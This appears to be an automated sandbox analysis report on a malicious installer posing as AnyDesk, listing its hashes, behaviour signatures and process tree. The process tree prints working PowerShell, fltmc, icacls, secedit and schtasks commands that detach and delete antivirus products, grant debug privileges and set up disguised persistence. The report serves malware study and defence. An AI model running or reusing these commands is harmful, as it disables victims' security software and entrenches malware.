Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-09-2024 06:57

General

  • Target

    Anydesk6.6.msi

  • Size

    4.3MB

  • MD5

    ec6e20cf1e3298163f08b2166ba9fa33

  • SHA1

    2e829c7f7ab05279b2af14f61c8265e0ebbc32db

  • SHA256

    41241f3bc8472cba920e35528728ed3a1070aa6b48c50b34ad3f5dcf0dd4d9bb

  • SHA512

    88449b0e10e9f6762a173ea2bb4853c38bb3864a83a97024fa7138ca2e8657daf03c1aa5def0b629d775a0e7f45d9e9b11b27e626f1b9a10ec1a91f90fbf8aa3

  • SSDEEP

    98304:KgBB2Siit8OEzYhTn9XwCA4IkVMDA+loJ:Hiitm0hhwl9NloJ

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Anydesk6.6.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3592
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:1216
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding E36A3B18DC868C971B351726AEA4B676
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1984
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360安全卫士*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '腾讯电脑管家' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '火绒' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4920
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '金山毒霸' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3824
        • C:\ProgramData\Data\un.exe
          "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
          3⤵
          • Executes dropped EXE
          PID:2112
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" false
          3⤵
          • UAC bypass
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:4668
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3852
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:728
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2584
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2908
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1484
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1496
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1336
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360安全卫士*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3284
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:4072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '火绒' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(系统音频服务)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2776
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(系统音频服务)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1856
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360安全卫士*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3244
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '火绒' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:4040
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:2320

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Config.Msi\e57d439.rbs

      Filesize

      10KB

      MD5

      775affc10fb100640b8bc81c9bd31bf5

      SHA1

      3ba3c652bad58266102323c3114d7138404db06a

      SHA256

      0468d6c8f95d5426b7d95a0c9a94a7d28fc54b5c8ff3a6239b1c6eefdc2f91c9

      SHA512

      03365ba484eab628171f3038679640ea2d8096a74840bd6033333490ef4b4b1cafcdccbf8cf69e13d872f94cec0c0d67b2bc18f6b4c8d443a082b19b40a7d114

    • C:\ProgramData\Data\un.exe

      Filesize

      601KB

      MD5

      4fdc31997eb40979967fc04d9a9960f3

      SHA1

      7f13bd62c13324681913304644489bb6b66f584a

      SHA256

      e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2

      SHA512

      15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

    • C:\ProgramData\Data\upx.rar

